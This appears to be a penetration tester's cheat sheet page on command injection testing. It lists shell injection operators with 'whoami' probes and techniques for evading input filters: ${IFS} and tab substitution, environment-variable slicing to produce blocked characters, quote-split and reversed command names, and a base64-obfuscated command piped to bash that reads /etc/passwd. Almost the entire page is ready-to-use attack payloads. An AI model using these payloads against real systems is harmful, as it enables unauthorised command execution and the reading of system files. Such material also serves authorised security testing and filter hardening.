Comment on page

Command Injection Testing

Parameter
Objective
-h or /?
What is the system output from using help menu commands?
;,
; echo whoami
Unix only; run echo after initial command
|,
echo whoami|
Perl-specific injection to open files
||,
|| echo whoami
Run command if the initial command returns non-zero as the exit status
& ,
& echo whoami
Run initial command as background task and run next task immediately
&& ,
&& echo whoami
Run if the initial command returns zero as the exit status
$(whoami)
Unix-only; Bash command execution
`whoami`
Unix only; using generic process substitution
>(whoami)
Unix only; using process substitution
Identifying Blacklisted Characters
Check in Burp with each Command Injection operators.
Bypassing Space Filters
# Add TAB
%09
​
# Add SPACE
${IFS}
​
# Add Brace Expresions
{ls,-al}
Bypassing Other Blacklisted Characters (Linux)
# Add /
${PATH:0:1}
​
# Add ;
${LS_COLORS:10:1}
​
# Character Shifting
man ascii (Find \) = 92 
$(tr '!-}' '"-~'<<<[)
Bypassing Other Blacklisted Characters (Windows)
# Add \
%HOMEPATH:~6,-11%
$env:HOMEPATH[0]
Bypassing Blacklisted Commands (Linux)
w'h'o'am'i
w"h"o"am"i
who$@ami
w\ho\am\i
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
$(rev<<<'imaohw')
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Parameter	Objective
`-h` or `/?`	What is the system output from using help menu commands?
`;`, `; echo whoami`	Unix only; run echo after initial command
`\|`, `echo whoami\|`	Perl-specific injection to open files
`\|\|`, `\|\| echo whoami`	Run command if the initial command returns non-zero as the exit status
`&` , `& echo whoami`	Run initial command as background task and run next task immediately
`&&` , `&& echo whoami`	Run if the initial command returns zero as the exit status
`$(whoami)`	Unix-only; Bash command execution
`whoami`	Unix only; using generic process substitution
`>(whoami)`	Unix only; using process substitution

Web Tools

Noteworthy Technical Content

Last modified 6mo ago